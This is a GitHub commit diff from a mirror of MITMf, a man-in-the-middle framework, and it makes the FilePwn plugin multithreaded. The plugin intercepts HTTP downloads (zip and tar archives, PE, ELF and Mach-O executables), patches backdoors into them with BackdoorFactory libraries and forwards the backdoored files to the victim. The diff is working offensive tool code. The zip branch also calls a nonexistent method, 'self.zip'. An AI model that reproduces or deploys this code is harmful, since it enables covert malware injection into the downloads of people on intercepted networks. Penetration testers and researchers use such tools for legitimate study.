github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 05:22:15 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Filepwn plugin is now multithreaded (backported)

Browse source
This commit is contained in:
byt3bl33d3r 2015-04-09 17:29:22 +02:00
parent 5e56049e44
commit 1a8d5191c4
1 changed files with 63 additions and 14 deletions
Download patch file Download diff file Expand all files Collapse all files

77
plugins/FilePwn.py
View file

@ -1,3 +1,23 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
""" """
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
@ -45,6 +65,8 @@ import shutil
import random import random
import string import string
import tarfile import tarfile
import multiprocessing
from libs.bdfactory import pebin from libs.bdfactory import pebin
from libs.bdfactory import elfbin from libs.bdfactory import elfbin
from libs.bdfactory import machobin from libs.bdfactory import machobin
@ -65,6 +87,8 @@ class FilePwn(Plugin):
'''Called if plugin is enabled, passed the options namespace''' '''Called if plugin is enabled, passed the options namespace'''
self.options = options self.options = options
self.patched = multiprocessing.Queue()
#FOR FUTURE USE #FOR FUTURE USE
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
@ -262,7 +286,8 @@ class FilePwn(Plugin):
) )
result = targetFile.run_this() result = targetFile.run_this()
return result self.patched.put(result)
return
except Exception as e: except Exception as e:
print 'Exception', str(e) print 'Exception', str(e)
@ -277,7 +302,8 @@ class FilePwn(Plugin):
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size" print "[!] TarFile over allowed size"
logging.info("TarFIle maxSize met %s", len(aTarFileBytes)) logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
return aTarFileBytes self.patched.put(aTarFileBytes)
return
with tempfile.NamedTemporaryFile() as tarFileStorage: with tempfile.NamedTemporaryFile() as tarFileStorage:
tarFileStorage.write(aTarFileBytes) tarFileStorage.write(aTarFileBytes)
@ -285,7 +311,8 @@ class FilePwn(Plugin):
if not tarfile.is_tarfile(tarFileStorage.name): if not tarfile.is_tarfile(tarFileStorage.name):
print '[!] Not a tar file' print '[!] Not a tar file'
return aTarFileBytes self.patched.put(aTarFileBytes)
return
compressionMode = ':' compressionMode = ':'
if formatt == 'gz': if formatt == 'gz':
@ -302,7 +329,8 @@ class FilePwn(Plugin):
if tarFile is None: if tarFile is None:
print '[!] Not a tar file' print '[!] Not a tar file'
return aTarFileBytes self.patched.put(aTarFileBytes)
return
print '[*] Tar file contents and info:' print '[*] Tar file contents and info:'
print '[*] Compression:', formatt print '[*] Compression:', formatt
@ -388,9 +416,11 @@ class FilePwn(Plugin):
if wasPatched is False: if wasPatched is False:
# If nothing was changed return the original # If nothing was changed return the original
print "[*] No files were patched forwarding original file" print "[*] No files were patched forwarding original file"
return aTarFileBytes self.patched.put(aTarFileBytes)
return
else: else:
return ret self.patched.put(ret)
return
def zip_files(self, aZipFile): def zip_files(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file" "When called will unpack and edit a Zip File and return a zip file"
@ -400,7 +430,8 @@ class FilePwn(Plugin):
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
print "[!] ZipFile over allowed size" print "[!] ZipFile over allowed size"
logging.info("ZipFIle maxSize met %s", len(aZipFile)) logging.info("ZipFIle maxSize met %s", len(aZipFile))
return aZipFile self.patched.put(aZipFile)
return
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
tmpDir = '/tmp/' + tmpRan tmpDir = '/tmp/' + tmpRan
@ -500,9 +531,11 @@ class FilePwn(Plugin):
if wasPatched is False: if wasPatched is False:
print "[*] No files were patched forwarding original file" print "[*] No files were patched forwarding original file"
return aZipFile self.patched.put(aZipFile)
return
else: else:
return tempZipFile self.patched.put(tempZipFile)
return
def handleResponse(self, request, data): def handleResponse(self, request, data):
@ -513,7 +546,13 @@ class FilePwn(Plugin):
if self.bytes_have_format(data, 'zip'): if self.bytes_have_format(data, 'zip'):
logging.info("%s Detected supported zip file type!" % client_ip) logging.info("%s Detected supported zip file type!" % client_ip)
bd_zip = self.zip_files(data)
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
process.daemon = True
process.start()
process.join()
bd_zip = self.patched.get()
if bd_zip: if bd_zip:
logging.info("%s Patching complete, forwarding to client" % client_ip) logging.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_zip} return {'request': request, 'data': bd_zip}
@ -522,7 +561,13 @@ class FilePwn(Plugin):
for tartype in ['gz','bz','tar']: for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype): if self.bytes_have_format(data, tartype):
logging.info("%s Detected supported tar file type!" % client_ip) logging.info("%s Detected supported tar file type!" % client_ip)
bd_tar = self.tar_files(data)
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
process.daemon = True
process.start()
process.join()
bd_tar = self.patched.get()
if bd_tar: if bd_tar:
logging.info("%s Patching complete, forwarding to client" % client_ip) logging.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_tar} return {'request': request, 'data': bd_tar}
@ -535,9 +580,13 @@ class FilePwn(Plugin):
fd, tmpFile = mkstemp() fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f: with open(tmpFile, 'w') as f:
f.write(data) f.write(data)
patchb = self.binaryGrinder(tmpFile) process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
process.daemon = True
process.start()
process.join()
patchb = self.patched.get()
if patchb: if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile)) os.remove('./backdoored/' + os.path.basename(tmpFile))